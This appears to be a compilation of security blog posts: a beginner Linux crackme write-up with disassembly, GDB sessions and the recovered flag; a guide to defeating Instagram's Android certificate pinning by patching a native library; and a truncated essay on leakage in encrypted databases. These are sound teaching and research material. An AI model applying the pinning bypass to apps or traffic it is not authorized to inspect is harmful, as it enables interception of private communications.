    126d:  c7 45 e0 00 00 00 00  mov    DWORD PTR [ebp-0x20],0x0
    1274:  eb 1a                 jmp    1290 <main+0xa7>
    1276:  8b 46 04              mov    eax,DWORD PTR [esi+0x4]
    1279:  83 c0 04              add    eax,0x4
    127c:  8b 10                 mov    edx,DWORD PTR [eax]
    127e:  8b 45 e0              mov    eax,DWORD PTR [ebp-0x20]
    1281:  01 d0                 add    eax,edx
    1283:  0f b6 00              movzx  eax,BYTE PTR [eax]
    1286:  0f be c0              movsx  eax,al
    1289:  01 45 e4              add    DWORD PTR [ebp-0x1c],eax
    128c:  83 45 e0 01           add    DWORD PTR [ebp-0x20],0x1
    1290:  8b 45 e0              mov    eax,DWORD PTR [ebp-0x20]
    1293:  3b 45 dc              cmp    eax,DWORD PTR [ebp-0x24]
    1296:  7c de                 jl     1276 <main+0x8d>
    1298:  81 7d e4 21 03 00 00  cmp    DWORD PTR [ebp-0x1c],0x321
    129f:  75 1a                 jne    12bb <main+0xd2>
    12a1:  e8 33 00 00 00        call   12d9 <comp_key>
    12a6:  83 ec 08              sub    esp,0x8
    12a9:  50                    push   eax
    12aa:  8d 83 3c e0 ff ff     lea    eax,[ebx-0x1fc4]
    12b0:  50                    push   eax
    12b1:  e8 8a fd ff ff        call   1040 <printf@plt>
    12b6:  83 c4 10              add    esp,0x10
    12b9:  eb 12                 jmp    12cd <main+0xe4>
    12bb:  83 ec 0c              sub    esp,0xc
    12be:  8d 83 5e e0 ff ff     lea    eax,[ebx-0x1fa2]
    12c4:  50                    push   eax
    12c5:  e8 86 fd ff ff        call   1050 <puts@plt>
    12ca:  83 c4 10              add    esp,0x10
    12cd:  90                    nop
    12ce:  8d 65 f4              lea    esp,[ebp-0xc]
    12d1:  59                    pop    ecx
    12d2:  5b                    pop    ebx
    12d3:  5e                    pop    esi
    12d4:  5d                    pop    ebp
    12d5:  8d 61 fc              lea    esp,[ecx-0x4]
    12d8:  c3                    ret

000012d9 <comp_key>:
    12d9:  55                    push   ebp
    12da:  89 e5                 mov    ebp,esp
    12dc:  57                    push   edi
    12dd:  56                    push   esi
    12de:  53                    push   ebx
    12df:  83 ec 7c              sub    esp,0x7c
    12e2:  e8 09 fe ff ff        call   10f0 <__x86.get_pc_thunk.bx>
    12e7:  81 c3 19 2d 00 00     add    ebx,0x2d19
    12ed:  c7 45 e4 00 00 00 00  mov    DWORD PTR [ebp-0x1c],0x0
    12f4:  c7 45 a8 4c 00 00 00  mov    DWORD PTR [ebp-0x58],0x4c
    12fb:  c7 45 ac 33 00 00 00  mov    DWORD PTR [ebp-0x54],0x33
    1302:  c7 45 b0 74 00 00 00  mov    DWORD PTR [ebp-0x50],0x74
    1309:  c7 45 b4 73 00 00 00  mov    DWORD PTR [ebp-0x4c],0x73
    1310:  c7 45 b8 5f 00 00 00  mov    DWORD PTR [ebp-0x48],0x5f
    1317:  c7 45 bc 67 00 00 00  mov    DWORD PTR [ebp-0x44],0x67
    131e:  c7 45 c0 33 00 00 00  mov    DWORD PTR [ebp-0x40],0x33
    1325:  c7 45 c4 74 00 00 00  mov    DWORD PTR [ebp-0x3c],0x74
    132c:  c7 45 c8 5f 00 00 00  mov    DWORD PTR [ebp-0x38],0x5f
    1333:  c7 45 cc 69 00 00 00  mov    DWORD PTR [ebp-0x34],0x69
    133a:  c7 45 d0 6e 00 00 00  mov    DWORD PTR [ebp-0x30],0x6e
    1341:  c7 45 d4 32 00 00 00  mov    DWORD PTR [ebp-0x2c],0x32
    1348:  c7 45 d8 5f 00 00 00  mov    DWORD PTR [ebp-0x28],0x5f
    134f:  c7 45 dc 52 00 00 00  mov    DWORD PTR [ebp-0x24],0x52
    1356:  c7 45 e0 33 00 00 00  mov    DWORD PTR [ebp-0x20],0x33
    135d:  8b 55 e0              mov    edx,DWORD PTR [ebp-0x20]
    1360:  8b 75 dc              mov    esi,DWORD PTR [ebp-0x24]
    1363:  8b 45 d8              mov    eax,DWORD PTR [ebp-0x28]
    1366:  89 45 a4              mov    DWORD PTR [ebp-0x5c],eax
    1369:  8b 4d d4              mov    ecx,DWORD PTR [ebp-0x2c]
    136c:  89 4d a0              mov    DWORD PTR [ebp-0x60],ecx
    136f:  8b 7d d0              mov    edi,DWORD PTR [ebp-0x30]
    1372:  89 7d 9c              mov    DWORD PTR [ebp-0x64],edi
    1375:  8b 45 cc              mov    eax,DWORD PTR [ebp-0x34]
    1378:  89 45 98              mov    DWORD PTR [ebp-0x68],eax
    137b:  8b 4d c8              mov    ecx,DWORD PTR [ebp-0x38]
    137e:  89 4d 94              mov    DWORD PTR [ebp-0x6c],ecx
    1381:  8b 7d c4              mov    edi,DWORD PTR [ebp-0x3c]
    1384:  89 7d 90              mov    DWORD PTR [ebp-0x70],edi
    1387:  8b 45 c0              mov    eax,DWORD PTR [ebp-0x40]
    138a:  89 45 8c              mov    DWORD PTR [ebp-0x74],eax
    138d:  8b 4d bc              mov    ecx,DWORD PTR [ebp-0x44]
    1390:  89 4d 88              mov    DWORD PTR [ebp-0x78],ecx
    1393:  8b 7d b8              mov    edi,DWORD PTR [ebp-0x48]
    1396:  89 7d 84              mov    DWORD PTR [ebp-0x7c],edi
    1399:  8b 45 b4              mov    eax,DWORD PTR [ebp-0x4c]
    139c:  89 45 80              mov    DWORD PTR [ebp-0x80],eax
    139f:  8b 7d b0              mov    edi,DWORD PTR [ebp-0x50]
    13a2:  8b 4d ac              mov    ecx,DWORD PTR [ebp-0x54]
    13a5:  8b 45 a8              mov    eax,DWORD PTR [ebp-0x58]
    13a8:  83 ec 0c              sub    esp,0xc
    13ab:  52                    push   edx
    13ac:  56                    push   esi
    13ad:  ff 75 a4              push   DWORD PTR [ebp-0x5c]
    13b0:  ff 75 a0              push   DWORD PTR [ebp-0x60]
    13b3:  ff 75 9c              push   DWORD PTR [ebp-0x64]
    13b6:  ff 75 98              push   DWORD PTR [ebp-0x68]
    13b9:  ff 75 94              push   DWORD PTR [ebp-0x6c]
    13bc:  ff 75 90              push   DWORD PTR [ebp-0x70]
    13bf:  ff 75 8c              push   DWORD PTR [ebp-0x74]
    13c2:  ff 75 88              push   DWORD PTR [ebp-0x78]
    13c5:  ff 75 84              push   DWORD PTR [ebp-0x7c]
    13c8:  ff 75 80              push   DWORD PTR [ebp-0x80]
    13cb:  57                    push   edi
    13cc:  51                    push   ecx
    13cd:  50                    push   eax
    13ce:  8d 83 78 e0 ff ff     lea    eax,[ebx-0x1f88]
    13d4:  50                    push   eax
    13d5:  8d 83 30 00 00 00     lea    eax,[ebx+0x30]
    13db:  50                    push   eax
    13dc:  e8 af fc ff ff        call   1090 <sprintf@plt>
    13e1:  83 c4 50              add    esp,0x50
    13e4:  8d 83 30 00 00 00     lea    eax,[ebx+0x30]
    13ea:  8d 65 f4              lea    esp,[ebp-0xc]
    13ed:  5b                    pop    ebx
    13ee:  5e                    pop    esi
    13ef:  5f                    pop    edi
    13f0:  5d                    pop    ebp
    13f1:  c3                    ret
    13f2:  66 90                 xchg   ax,ax
    13f4:  66 90                 xchg   ax,ax
    13f6:  66 90                 xchg   ax,ax
    13f8:  66 90                 xchg   ax,ax
    13fa:  66 90                 xchg   ax,ax
    13fc:  66 90                 xchg   ax,ax
    13fe:  66 90                 xchg   ax,ax

... Output Omitted ...

Debugging Live

I will use GDB-Peda for this, which makes it easier to understand. Let's first check the functions in the binary.
We can see functions such as main and comp_key.

gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x00001000  _init
0x00001040  printf@plt
0x00001050  puts@plt
0x00001060  exit@plt
0x00001070  strlen@plt
0x00001080  __libc_start_main@plt
0x00001090  sprintf@plt
0x000010a0  __cxa_finalize@plt
0x000010a8  __gmon_start__@plt
0x000010b0  _start
0x000010f0  __x86.get_pc_thunk.bx
0x00001100  deregister_tm_clones
0x00001140  register_tm_clones
0x00001190  __do_global_dtors_aux
0x000011e0  frame_dummy
0x000011e5  __x86.get_pc_thunk.dx
0x000011e9  main
0x000012d9  comp_key
0x00001400  __libc_csu_init
0x00001460  __libc_csu_fini
0x00001464  _fini

This is how you debug a program. We will set a breakpoint at the main function. Use n to step over a line and ni to step a single instruction. If you don't know assembly, in a basic challenge like this, look for jumps and compare instructions. Try to understand which checks the program performs and build the logic in your mind. There are many good crash courses on assembly, and I would recommend reading a few.
gdb-peda$ break main
Breakpoint 1 at 0x11f9
gdb-peda$ run aaaaaaaa
Starting program: /mnt/hgfs/shared/Linux RE/nix_5744af788e6cbdb29bb41e8b0e5f3cd5 aaaaaaaa
[----------------------------------registers-----------------------------------]
EAX: 0xf7f95dd8 --> 0xffffd2f0 --> 0xffffd4d1 ("NVM_DIR=/root/.nvm")
EBX: 0x0
ECX: 0xffffd250 --> 0x2
EDX: 0xffffd274 --> 0x0
ESI: 0xf7f94000 --> 0x1d5d8c
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd22c --> 0xffffd250 --> 0x2
EIP: 0x565561f9 (<main+16>: sub esp,0x1c)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x565561f6 <main+13>: push esi
   0x565561f7 <main+14>: push ebx
   0x565561f8 <main+15>: push ecx
=> 0x565561f9 <main+16>: sub esp,0x1c
   0x565561fc <main+19>: call 0x565560f0 <__x86.get_pc_thunk.bx>
   0x56556201 <main+24>: add ebx,0x2dff
   0x56556207 <main+30>: mov esi,ecx
   0x56556209 <main+32>: mov DWORD PTR [ebp-0x1c],0x0
[------------------------------------stack-------------------------------------]
0000| 0xffffd22c --> 0xffffd250 --> 0x2
0004| 0xffffd230 --> 0x0
0008| 0xffffd234 --> 0xf7f94000 --> 0x1d5d8c
0012| 0xffffd238 --> 0x0
0016| 0xffffd23c --> 0xf7dd79a1 (<__libc_start_main+241>: add esp,0x10)
0020| 0xffffd240 --> 0xf7f94000 --> 0x1d5d8c
0024| 0xffffd244 --> 0xf7f94000 --> 0x1d5d8c
0028| 0xffffd248 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x565561f9 in main ()
1: main = {<text variable, no debug info>} 0x565561e9 <main>
2: puts = {<text variable, no debug info>} 0xf7e25e40 <puts>
gdb-peda$

If you play with gdb for a little while, you will see how it works. Let's try to understand the logic part by part. The program first checks the number of arguments. A pointer to argc is held in the ecx register and moved to esi, and the value it points to is then compared with 0x2.
You can use gdb to step through the assembly instructions and understand them better.
0x56556207 <+30>: mov esi,ecx
0x56556209 <+32>: mov DWORD PTR [ebp-0x1c],0x0
0x56556210 <+39>: mov DWORD PTR [ebp-0x24],0x7
0x56556217 <+46>: cmp DWORD PTR [esi],0x2
0x5655621a <+49>: je 0x56556238 <main+79>
0x5655621c <+51>: sub esp,0xc
0x5655621f <+54>: lea eax,[ebx-0x1ff8]
0x56556225 <+60>: push eax
0x56556226 <+61>: call 0x56556040 <printf@plt>
0x5655622b <+66>: add esp,0x10
0x5655622e <+69>: sub esp,0xc
0x56556231 <+72>: push 0x1
0x56556233 <+74>: call 0x56556060 <exit@plt>
We can write pseudo code like this.
if (argc != 2) {
    printf("Usage: script.exe <key>");
    exit(1);
}
0x56556238 <+79>: mov eax,DWORD PTR [esi+0x4]
0x5655623b <+82>: add eax,0x4
0x5655623e <+85>: mov eax,DWORD PTR [eax]
0x56556240 <+87>: sub esp,0xc
0x56556243 <+90>: push eax
0x56556244 <+91>: call 0x56556070 <strlen@plt>
0x56556249 <+96>: add esp,0x10
0x5655624c <+99>: cmp eax,0xf
0x5655624f <+102>: jbe 0x5655626d <main+132>
0x56556251 <+104>: sub esp,0xc
0x56556254 <+107>: lea eax,[ebx-0x1fe0]
0x5655625a <+113>: push eax
0x5655625b <+114>: call 0x56556050 <puts@plt>
0x56556260 <+119>: add esp,0x10
0x56556263 <+122>: sub esp,0xc
0x56556266 <+125>: push 0x1
0x56556268 <+127>: call 0x56556060 <exit@plt>
After translating:
if (strlen(argv[1]) > 15) {
    puts("Length of argv[1] too long.");
    exit(1);
}
If you check the next block of code, you can see a loop iterating over each character of our supplied string.
0x5655626d <+132>: mov DWORD PTR [ebp-0x20],0x0 0x56556274 <+139>: jmp 0x56556290 <main+167> 0x56556276 <+141>: mov eax,DWORD PTR [esi+0x4] 0x56556279 <+144>: add eax,0x4 0x5655627c <+147>: mov edx,DWORD PTR [eax] 0x5655627e <+149>: mov eax,DWORD PTR [ebp-0x20] 0x56556281 <+152>: add eax,edx 0x56556283 <+154>: movzx eax,BYTE PTR [eax] 0x56556286 <+157>: movsx eax,al 0x56556289 <+160>: add DWORD PTR [ebp-0x1c],eax 0x5655628c <+163>: add DWORD PTR [ebp-0x20],0x1 0x56556290 <+167>: mov eax,DWORD PTR [ebp-0x20] 0x56556293 <+170>: cmp eax,DWORD PTR [ebp-0x24] 0x56556296 <+173>: jl 0x56556276 <main+141> 0x56556298 <+175>: cmp DWORD PTR [ebp-0x1c],0x321 0x5655629f <+182>: jne 0x565562bb <main+210> 0x565562a1 <+184>: call 0x565562d9 <comp_key> 0x565562a6 <+189>: sub esp,0x8 0x565562a9 <+192>: push eax 0x565562aa <+193>: lea eax,[ebx-0x1fc4] 0x565562b0 <+199>: push eax 0x565562b1 <+200>: call 0x56556040 <printf@plt> 0x565562b6 <+205>: add esp,0x10 0x565562b9 <+208>: jmp 0x565562cd <main+228> 0x565562bb <+210>: sub esp,0xc 0x565562be <+213>: lea eax,[ebx-0x1fa2] 0x565562c4 <+219>: push eax 0x565562c5 <+220>: call 0x56556050 <puts@plt> 0x565562ca <+225>: add esp,0x10 0x565562cd <+228>: nop 0x565562ce <+229>: lea esp,[ebp-0xc] 0x565562d1 <+232>: pop ecx 0x565562d2 <+233>: pop ebx 0x565562d3 <+234>: pop esi 0x565562d4 <+235>: pop ebp 0x565562d5 <+236>: lea esp,[ecx-0x4] 0x565562d8 <+239>: ret Up to how many characters does it loop? Here’s how I found it. Basically, our password must be of 7 characters in length. 
[----------------------------------registers-----------------------------------]
EAX: 0x6
EBX: 0x56559000 --> 0x3efc
ECX: 0x6
EDX: 0xffffd4c6 ("1234567890")
ESI: 0xffffd250 --> 0x2
EDI: 0x0
EBP: 0xffffd238 --> 0x0
ESP: 0xffffd210 --> 0xf7f943fc --> 0xf7f95200 --> 0x0
EIP: 0x56556293 (<main+170>: cmp eax,DWORD PTR [ebp-0x24])
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56556289 <main+160>: add DWORD PTR [ebp-0x1c],eax
   0x5655628c <main+163>: add DWORD PTR [ebp-0x20],0x1
   0x56556290 <main+167>: mov eax,DWORD PTR [ebp-0x20]
=> 0x56556293 <main+170>: cmp eax,DWORD PTR [ebp-0x24]
   0x56556296 <main+173>: jl 0x56556276 <main+141>
   0x56556298 <main+175>: cmp DWORD PTR [ebp-0x1c],0x321
   0x5655629f <main+182>: jne 0x565562bb <main+210>
   0x565562a1 <main+184>: call 0x565562d9 <comp_key>
[------------------------------------stack-------------------------------------]
0000| 0xffffd210 --> 0xf7f943fc --> 0xf7f95200 --> 0x0
0004| 0xffffd214 --> 0x7
0008| 0xffffd218 --> 0x6
0012| 0xffffd21c --> 0x135
0016| 0xffffd220 --> 0x2
0020| 0xffffd224 --> 0xffffd2e4 --> 0xffffd487 ("/mnt/hgfs/shared/Linux RE/nix_5744af788e6cbdb29bb41e8b0e5f3cd5")
0024| 0xffffd228 --> 0xffffd2f0 --> 0xffffd4d1 ("NVM_DIR=/root/.nvm")
0028| 0xffffd22c --> 0xffffd250 --> 0x2
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56556293 in main ()
gdb-peda$ print $ebp-0x24
$24 = (void *) 0xffffd214
gdb-peda$ x/x 0xffffd214
0xffffd214: 0x00000007
After translating to high-level code, it would look something similar to this.
for (i = 0; i < 7; i++)
    value += argv[1][i];
if (value != 801)
    return puts("\n[+] No flag for you. [+]");
return printf("[+] The flag is: SAYCURE{%s} [+]\n", comp_key());
Basically, the byte values of the first 7 characters of our password must sum to 801. With 7 characters to work with, we need byte values that add up to that total.
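As a rough sketch of the check translated above (an illustration in Python, not the binary's actual code), the snippet below sums the first seven bytes of a key and builds one key that hits the target. The helper names `checksum` and `make_key` are made up for this example, and it assumes the key is plain ASCII.

```python
TARGET = 0x321  # 801, the constant compared against in main
LENGTH = 7      # loop bound read from [ebp-0x24]


def checksum(key: str) -> int:
    """Sum the first LENGTH bytes of the key, like the loop in main."""
    return sum(key.encode("ascii")[:LENGTH])


def make_key(target: int = TARGET, length: int = LENGTH) -> str:
    """Spread the target sum as evenly as possible over `length` characters."""
    base, extra = divmod(target, length)
    # `extra` characters get one more than `base` so the total is exact.
    values = [base + 1] * extra + [base] * (length - extra)
    return "".join(chr(v) for v in values)


if __name__ == "__main__":
    key = make_key()
    print(key, checksum(key) == TARGET)
```

Any seven printable characters whose byte values add up to 801 should satisfy the same comparison, so this is only one of many possible keys.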
You can use any combination of characters whose values sum to 801, for example:
114 * 6 + 117 = 801
After this check is done it calls the comp_key function and prints out the flag. We don’t really need to dig into the comp_key function as it directly gives us the flag. Let’s check those characters in the ASCII table. 114 is ‘r’ and 117 is ‘u’.
Dec Hex Chr | Dec Hex Chr | Dec Hex Chr | Dec Hex Chr | Dec Hex Chr | Dec Hex Chr | Dec Hex Chr | Dec Hex Chr
0 00 NUL | 16 10 DLE | 32 20 SP | 48 30 0 | 64 40 @ | 80 50 P | 96 60 ` | 112 70 p
1 01 SOH | 17 11 DC1 | 33 21 ! | 49 31 1 | 65 41 A | 81 51 Q | 97 61 a | 113 71 q
2 02 STX | 18 12 DC2 | 34 22 " | 50 32 2 | 66 42 B | 82 52 R | 98 62 b | 114 72 r
3 03 ETX | 19 13 DC3 | 35 23 # | 51 33 3 | 67 43 C | 83 53 S | 99 63 c | 115 73 s
4 04 EOT | 20 14 DC4 | 36 24 $ | 52 34 4 | 68 44 D | 84 54 T | 100 64 d | 116 74 t
5 05 ENQ | 21 15 NAK | 37 25 % | 53 35 5 | 69 45 E | 85 55 U | 101 65 e | 117 75 u
6 06 ACK | 22 16 SYN | 38 26 & | 54 36 6 | 70 46 F | 86 56 V | 102 66 f | 118 76 v
7 07 BEL | 23 17 ETB | 39 27 ' | 55 37 7 | 71 47 G | 87 57 W | 103 67 g | 119 77 w
8 08 BS | 24 18 CAN | 40 28 ( | 56 38 8 | 72 48 H | 88 58 X | 104 68 h | 120 78 x
9 09 HT | 25 19 EM | 41 29 ) | 57 39 9 | 73 49 I | 89 59 Y | 105 69 i | 121 79 y
10 0A LF | 26 1A SUB | 42 2A * | 58 3A : | 74 4A J | 90 5A Z | 106 6A j | 122 7A z
11 0B VT | 27 1B ESC | 43 2B + | 59 3B ; | 75 4B K | 91 5B [ | 107 6B k | 123 7B {
12 0C FF | 28 1C FS | 44 2C , | 60 3C < | 76 4C L | 92 5C \ | 108 6C l | 124 7C |
13 0D CR | 29 1D GS | 45 2D - | 61 3D = | 77 4D M | 93 5D ] | 109 6D m | 125 7D }
14 0E SO | 30 1E RS | 46 2E . | 62 3E > | 78 4E N | 94 5E ^ | 110 6E n | 126 7E ~
15 0F SI | 31 1F US | 47 2F / | 63 3F ? | 79 4F O | 95 5F _ | 111 6F o | 127 7F DEL
That’s it! We just solved a very simple binary.
# ./nix_5744af788e6cbdb29bb41e8b0e5f3cd5 rrrrrru
[+] The flag is: SAYCURE{L3ts_g3t_in2_R3} [+]
Check out my previous CTF solution posts here:
Birthday Crackme
Rootme No software breakpoints Cracking Challenge
Solving Root-me Ptrace challenge
https://asciinema.org/~Osanda
References
http://www.cirosantilli.com/elf-hello-world/
Source: https://osandamalith.com/2019/02/11/linux-reverse-engineering-ctfs-for-beginners/
How to bypass Instagram SSL Pinning on Android (v78) 9 February 2019 Marco Genovese My goal was to take a look at the HTTP requests that Instagram was making but, after setting an HTTP proxy, I couldn’t see anything. Turns out that Instagram is protected against MITM attacks using a technique called certificate validation (SSL Pinning) which compares the certificate provided by server in the TLS handshake with a trusted one embedded in APK. Instagram refuses to complete TLS handshake if certificate doesn’t match This article is based on Instagram APK version 78.0.0.11.104 (x86) which you can download here. I am also using an Android 8.0 emulator with adb running as root. Disclaimer The sole purpose of this article is educational and for testing of your own applications. This is not intended for piracy or any other non-legal use. Setting up Burp to work with TLS 1.3 Facebook deployed TLS 1.3 at very large scale with their open source library Fizz. It doesn’t surprise me that they decided to use it on their Instagram application to make internet traffic more secure. This time I decided to use Burp to capture requests that Instagram app is making. After setting up the proxy, some weird alert appears in the Alerts tab. What is this weird “no cipher suites in common” message? Looks like this version of Burp does not support TLSv1.3 cipher suites. We can verify this by going to Project Options > SSL and list all ciphers. A simple solution to this problem is to run Burp with the latest version of JDK. At that point, you can run burpsuite_community.jar with the newly extracted java binary taken from JDK: ./Downloads/jdk-11.0.2.jdk/Contents/Home/bin/java -jar burpsuite_community.jar This time after opening Instagram app we get a different message from Alerts tab. Now we get a different (fatal) alert: bad_certificate which tells us that the certificate provided by Burp is not accepted by the client. We have to dig deeper into the app internals to get around this issue. 
Patching Native Layer
Android applications can interact with native (C/C++) code using Java Native Interface (JNI). You can read more about it here. Instagram loads many native libraries from /data/data/com.instagram.android/lib-zstd which is created after the first app launch.
~ adb pull /data/data/com.instagram.android/lib-zstd
~ grep lib-zstd -re fizz
Binary file lib-zstd/libliger.so matches
Bingo! Let’s launch IDA Pro to take a look at this shared object file. After reading the source code, I spotted the exception which was causing this bad_certificate issue.
fizz > ClientProtocol.cpp
Let’s search for strings using IDA (View > Open Subviews > Strings). At offset 002831F4 in the read-only section (.rodata) we can see the constant we were looking for. IDA points us to the subroutine sub_3C864, which uses it. After analysing the flow, we can apply a simple patch at offset 0003CD4D, changing JNZ to JZ so that the exception is no longer thrown! Let’s apply the patches (Edit > Patch Program > Apply patches to input file) and push the newly patched libliger.so to the device.
adb push libliger.so /data/data/com.instagram.android/lib-zstd/libliger.so
Now Burp complains with a weird alert: That’s weird. Analysing traffic with Wireshark didn’t help much and gave me no additional clues. The next step was to debug the Android smali code using Android Studio (you can find a useful article here). I followed this StackOverflow reply to catch any exception and this shows up shortly after: This looks interesting. Let’s go back to IDA and search for the string constant “openssl cert verify error“. There is a match at offset 00295732, used by subroutine sub_176434. Similarly to what we’ve done before, we can patch this subroutine to avoid throwing this exception. Patch JNZ to JZ, apply to the input file and open Burp. Jackpot! We can now be the man in the middle and take a look at the “private” Instagram API.
Source: https://plainsec.org/how-to-bypass-instagram-ssl-pinning-on-android-v78/
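The JNZ-to-JZ patches in the article above were applied through IDA. As a hedged illustration of what such a patch amounts to at the byte level, the sketch below flips a conditional jump inside a byte buffer. The function name `flip_jnz_to_jz` is invented for this example and is not part of any tool mentioned above; the opcode values (0x75 to 0x74 for short jumps, 0x0F 0x85 to 0x0F 0x84 for near jumps) are the standard x86 encodings. Translating an address shown in IDA into a file offset depends on the ELF layout and is deliberately left out.

```python
def flip_jnz_to_jz(code: bytes, offset: int) -> bytes:
    """Return a copy of `code` with the JNZ at `offset` turned into JZ."""
    patched = bytearray(code)
    if patched[offset] == 0x75:
        # Short form: JNZ rel8 (0x75) becomes JZ rel8 (0x74).
        patched[offset] = 0x74
    elif patched[offset:offset + 2] == b"\x0f\x85":
        # Near form: JNZ rel32 (0F 85) becomes JZ rel32 (0F 84).
        patched[offset + 1] = 0x84
    else:
        # Refuse to touch bytes that are not a JNZ instruction.
        raise ValueError("no JNZ opcode at offset %#x" % offset)
    return bytes(patched)


if __name__ == "__main__":
    sample = b"\x85\xc0\x75\x05\x90"   # test eax,eax ; jnz +5 ; nop
    print(flip_jnz_to_jz(sample, 2).hex())
```

Checking the existing opcode before writing is a cheap guard against patching the wrong offset, which matters when the offset was copied by hand from a disassembler.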
Attack of the week: searchable encryption and the ever-expanding leakage function A few days ago I had the pleasure of hosting Kenny Paterson, who braved snow and historic cold (by Baltimore standards) to come talk to us about encrypted databases. Kenny’s newest result is with first authors Paul Grubbs, Marie-Sarah Lacharité and Brice Minaud (let’s call it GLMP). It isn’t so much about building encrypted databases, as it is about the risks of building them badly. And — for reasons I will get into shortly — there have been a lot of badly-constructed encrypted database schemes going around. What GLMP point out is that this weakness isn’t so much a knock against the authors of those schemes, but rather, an indication that they may just be trying to do the impossible. Hopefully this is a good enough start to get you drawn in. Which is excellent, because I’m going to need to give you a lot of background. What’s an “encrypted” database, and why are they a problem? Databases (both relational and otherwise) are a pretty important part of the computing experience. Modern systems make vast use of databases and their accompanying query technology in order to power just about every software application we depend on. Because these databases often contain sensitive information, there has been a strong push to secure that data. A key goal is to encrypt the contents of the database, so that a malicious database operator (or a hacker) can’t get access to it if they compromise a single machine. If we lived in a world where security was all that mattered, the encryption part would be pretty easy: database records are, after all, just blobs of data — and we know how to encrypt those. So we could generate a cryptographic key on our local machine, encrypt the data before we upload it to a vulnerable database server, and just keep that key locally on our client computer. Voila: we’re safe against a database hack! 
The problem with this approach is that encrypting the database records leaves us with a database full of opaque, unreadable encrypted junk. Since we have the decryption key on our client, we can decrypt and read those records after we’ve downloaded them. But this approach completely disables one of the most useful features of modern databases: the ability for the database server itself to search (or query) the database for specific records, so that the client doesn’t have to. Unfortunately, standard encryption borks search capability pretty badly. If I want to search a database for, say, employees whose salary is between $50,000 and $100,000, my database is helpless: all it sees is row after row of encrypted gibberish. In the worst case, the client will have to download all of the data rows and search them itself — yuck. This has led to much wailing and gnashing of teeth in the database community. As a result, many cryptographers (and a distressing number of non-cryptographers) have tried to fix the problem with “fancier” crypto. This has not gone very well. It would take me a hundred years to detail all of the various solutions that have been put forward. But let me just hit a few of the high points: Some proposals have suggested using deterministic encryption to encrypt database records. Deterministic encryption ensures that a given plaintext will always encrypt to a single ciphertext value, at least for a given key. This enables exact-match queries: a client can simply encrypt the exact value (“John Smith”) that it’s searching for, and ask the database to identify encrypted rows that match it. Of course, exact-match queries don’t support more powerful features. Most databases also need to support range queries. One approach to this is something called order revealing encryption (or its weaker sibling, order preserving encryption).
These do exactly what they say they do: they allow the database to compare two encrypted records to determine which plaintext is greater than the other. Some people have proposed to use trusted hardware to solve these problems in a “simpler” way, but as we like to say in cryptography: if we actually had trusted hardware, nobody would pay our salaries. And, speaking more seriously, even hardware might not stop the leakage-based attacks discussed below. This summary barely scratches the surface of this problem, and frankly you don’t need to know all the details for the purpose of this blog post. What you do need to know is that each of the above proposals entails some degree of “leakage”. Namely, if I’m an attacker who is able to compromise the database, both to see its contents and to see how it responds when you (a legitimate user) make a query, then I can learn something about the data being queried.
What are some examples of leakage, and what’s a leakage function?
Leakage is a (nearly) unavoidable byproduct of an encrypted database that supports queries. It can happen when the attacker simply looks at the encrypted data, as she might if she was able to dump the contents of your database and post them on the dark web. But a more powerful type of leakage occurs when the attacker is able to compromise your database server and observe the query interaction between legitimate client(s) and your database. Take deterministic encryption, for instance. Deterministic encryption has the very useful, but also unpleasant feature that the same plaintext will always encrypt to the same ciphertext. This leads to very obvious types of leakage, in the sense that an attacker can see repeated records in the dataset itself. Extending this to the active setting, if a legitimate client queries on a specific encrypted value, the attacker can see exactly which records match the client’s encrypted value.
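Here is a minimal sketch of that equality leakage. It is only an illustration: HMAC-SHA256 stands in for a deterministic encryption scheme (it is a keyed function, not real encryption, but it has the same "equal inputs give equal outputs" property), and the key, the names and the helper `det_token` are all made up for the example.

```python
import hashlib
import hmac
from collections import Counter


def det_token(key: bytes, value: str) -> str:
    """Deterministic stand-in: the same key and value always give the same token."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()


key = b"client-side secret"  # never leaves the client
names = ["Smith", "Azriel", "Smith", "Jones", "Smith"]
column = [det_token(key, name) for name in names]  # what the server stores

# Attacker view 1: a histogram of the stored tokens, no key required.
histogram = Counter(column)

# Attacker view 2: the rows touched when the client queries for one value.
query = det_token(key, "Smith")
matching_rows = [i for i, token in enumerate(column) if token == query]

if __name__ == "__main__":
    print(sorted(histogram.values()), matching_rows)
```

The attacker never learns the key, yet both the frequency of each stored value and the set of rows matching a query are visible on the server side.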
She can see how often each value occurs, which gives an indication of what value it might be (e.g., the last name “Smith” is more common than “Azriel”.) All of these vectors leak valuable information to an attacker. Other systems leak more. Order-preserving encryption leaks the exact order of a list of underlying records, because it causes the resulting ciphertexts to have the same order. This is great for searching and sorting, but unfortunately it leaks tons of useful information to an attacker. Indeed, researchers have shown that, in real datasets, an ordering can be combined with knowledge about the record distribution in order to (approximately) reconstruct the contents of an encrypted database. Fancier order-revealing encryption schemes aren’t quite so careless with your confidentiality: they enable the legitimate client to perform range queries, but without leaking the full ordering so trivially. This approach can leak less information: but a persistent attacker will still learn some data from observing a query and its response — at a minimum, she will learn which rows constitute the response to a query, since the database must pack up the matching records and send them over to the client. If you’re having trouble visualizing what this last type of leakage might look like, here’s a picture that shows what an attacker might see when a user queries an unencrypted database vs. what the attacker might see with a really “good” encrypted database that supports range queries: So the TL;DR here is that many encrypted database schemes have some sort of “leakage”, and this leakage can potentially reveal information about (a) what a client is querying on, and (b) what data is in the actual database.
But surely cryptographers don’t build leaky schemes?
Sometimes the perfect is the enemy of the good. Cryptographers could spend a million years stressing themselves to death over the practical impact of different types of leakage.
